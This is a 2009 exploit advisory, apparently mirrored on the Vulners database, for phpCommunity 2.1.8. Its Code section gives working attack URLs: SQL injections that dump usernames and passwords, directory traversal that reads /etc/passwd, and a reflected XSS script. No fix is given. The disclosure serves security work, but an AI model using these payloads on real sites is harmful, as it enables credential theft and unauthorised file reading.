Vulners
Lucene search
phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting
******* Salvatore "drosophila" Fresta *******
[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/
[+] Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
[+] Exploitation: Remote
[+] Date: 07 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
[-] Requisites: none
[-] File affected: templates/1/login.php
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg=<script>alert('XSS');</script>
*************************************************
[+] Fix
No fix.
*************************************************
# milw0rm.com [2009-03-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2009 00:00Current
7.4High risk
Vulners AI Score7.4